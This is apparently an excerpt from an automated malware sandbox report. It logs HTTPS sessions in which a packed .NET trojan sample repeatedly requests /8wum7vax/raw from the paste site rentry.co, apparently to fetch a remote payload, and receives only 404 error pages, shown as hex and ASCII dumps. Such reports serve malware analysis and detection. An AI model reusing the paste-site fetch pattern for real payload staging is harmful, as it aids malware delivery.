                                                                                        2024-10-18 10:43:54 UTC705INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:54 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <m
                                                                                        2024-10-18 10:43:54 UTC1369INData Raw: 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20
                                                                                        Data Ascii: ry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:54 UTC1017INData Raw: 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 31 35 61 38 66 32 36 62 65 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4e 43
                                                                                        Data Ascii: js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee15a8f26bec',t:'MTcyOTI0ODIzNC
                                                                                        2024-10-18 10:43:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        61192.168.2.660717104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:54 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:55 UTC666INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:55 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDfD3XqSmn2be%2FgAIygbQR%2F6wM4%2BrGwjqEX8L19l652EJTOOT%2FwHxse%2BYQagRz8k4Sn%2BJdMjDQot6epcPtPD%2FpYIH%2BHysSuBikgfsEhdqu9UGGxtTzbA4JBQ6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee1c1aa12ff0-DFW
                                                                                        2024-10-18 10:43:55 UTC703INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:55 UTC1369INData Raw: 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />
                                                                                        2024-10-18 10:43:55 UTC1369INData Raw: 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20
                                                                                        Data Ascii: ntry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:55 UTC1019INData Raw: 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 31 63 31 61 61 31 32 66 66 30 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a
                                                                                        Data Ascii: c/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee1c1aa12ff0',t:'MTcyOTI0ODIz
                                                                                        2024-10-18 10:43:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        62192.168.2.660718104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:55 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:56 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:56 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McTIuI8usaosZZtGfjgEVSe1oTKYSKvw5vETjYc7jxnrudf6BHhAfETG4I%2BPaNkB9l7M9gbvS0fFcPGrfs3NZSgjR3PYBs4EOXHDY6U4wWNpswkob%2BlBfJ3xkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee229fe8e827-DFW
                                                                                        2024-10-18 10:43:56 UTC715INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:56 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:56 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:56 UTC1006INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 32 32 39 66 65 38 65 38 32 37 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4e 69 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee229fe8e827',t:'MTcyOTI0ODIzNi4wMDAwMDA=
                                                                                        2024-10-18 10:43:56 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:43:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        63192.168.2.660719104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:56 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:57 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:57 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXH%2B4OwiGGS6icdmssTrjYMxtVQPUKBSAtIbxSBnIm9ZdTfJcuELCaUDMDuBWMFic72awpjbpvj7I71DWLy%2FdYQajuxHfZSPCw9s7yksiPZdeqTyYg3qaVzFtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee293e2a3583-DFW
                                                                                        2024-10-18 10:43:57 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:57 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:57 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:57 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 32 39 33 65 32 61 33 35 38 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4e 79 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee293e2a3583',t:'MTcyOTI0ODIzNy4wMDAwMDA=
                                                                                        2024-10-18 10:43:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        64192.168.2.660720104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:58 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:58 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:58 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7t2sYUy3uYbwbr7d%2FOMHZ9dAtZ247C1V%2BJxUMES2%2FUIRwx%2FE2fTM7VblDN%2FFxUZF%2BWrEEWGxvyR0NVMultxEEyBudLMGSZ9P4F03igxELJQMs5gyzn6sebfECw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee31ed092cae-DFW
